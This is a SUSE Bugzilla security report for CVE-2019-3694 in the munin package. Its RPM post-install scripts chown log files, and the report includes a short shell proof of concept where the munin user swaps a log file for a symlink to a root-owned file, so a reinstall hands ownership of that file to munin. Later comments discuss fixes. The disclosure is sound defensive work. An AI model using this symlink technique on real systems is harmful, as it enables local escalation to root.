Bug 1155078 - (CVE-2019-3694) VUL-0: CVE-2019-3694: munin: LPE from munin to root
(CVE-2019-3694)
VUL-0: CVE-2019-3694: munin: LPE from munin to root
Status: NEW
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Audits
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Wolfgang Rosenauer
Security Team bot
https://smash.suse.de/issue/245791/
:
Depends on:
Blocks: 1154062
  Show dependency treegraph
 
Reported: 2019-10-25 09:16 UTC by Johannes Segitz
Modified: 2021-06-23 11:51 UTC (History)
2 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Johannes Segitz 2019-10-25 09:16:45 UTC
214 %post
215 chown -R munin:munin %{htmldir}
216 chown -R munin:munin %{dbdir}
217 chmod 755 %{dbdir}
218 touch %{logdir}/munin-graph.log %{logdir}/munin-html.log %{logdir}/munin-nagios.log %{logdir}/munin-limits.log %{logdir}/munin-update.log
219 chown munin:munin %{logdir}/*

allows LPE from munin to root. POC:
sh-5.0$ id
uid=463(munin) gid=462(munin) groups=462(munin)
sh-5.0$ pwd
/var/log/munin
sh-5.0$ rm munin-graph.log
sh-5.0$ ln -s /test/shadow munin-graph.log
sh-5.0$ ls -l
total 0
lrwxrwxrwx 1 munin munin 12 Oct 25 11:13 munin-graph.log -> /test/shadow
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-html.log
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-limits.log
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-nagios.log
-rw-r--r-- 1 root  root   0 Oct 25 11:12 munin-node.log
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-update.log
sh-5.0$ ls -l /test/
total 4
-r-------- 1 root root 1228 Oct 25 11:01 shadow

force reinstall of munin

sh-5.0$ ls -l /test/
total 4
-r-------- 1 munin munin 1228 Oct 25 11:13 shadow

The recursive chown calls can be exploited in a similar way with hardlinks on systems that have fs.protected_hardlinks=0
Comment 1 Johannes Segitz 2019-10-25 11:58:39 UTC
Please use CVE-2019-3694 to track this. We can make this bug public at any time.
Comment 2 Johannes Segitz 2019-10-25 12:08:06 UTC
similar issues in %post node
256 %post node
257 if [ $1 = 1 ]; then
258 /usr/sbin/munin-node-configure --shell | sh
259 fi
260 chown -R munin:munin %{dbdir}
261 chmod 755 %{dbdir}
262 touch %{logdir}/munin-node.log
263 chown munin:munin %{logdir}/*
264 chown root:root %{logdir}/munin-node.log*
265 chown -R nobody:nobody %{dbdir}/plugin-state/* >/dev/null 2>&1
Comment 3 Johannes Segitz 2019-12-19 09:55:27 UTC
can you please have look? We want to make these issue public in the near future. Thank you
Comment 4 Johannes Segitz 2020-01-24 10:40:25 UTC
Please submit for this
Comment 5 Johannes Segitz 2020-07-20 12:48:32 UTC
ping, please have a look
Comment 6 Wolfgang Rosenauer 2020-07-24 06:18:16 UTC
Do you have hints what the correct solution is?
Comment 7 Johannes Segitz 2020-07-24 08:21:50 UTC
(In reply to Wolfgang Rosenauer from comment #6)
So the easiest solution would be to remove this snippets and have rpm create the files with proper permissions. 

For the log files that might be tricky since you don't want to overwrite them upon update. Doesn't munin create them if they're missing? If not you can use runuser to touch them as munin directly, that's safe
Comment 8 Johannes Segitz 2021-06-23 11:51:40 UTC
Can you please submit for this? Feel free to reach out if you have questions.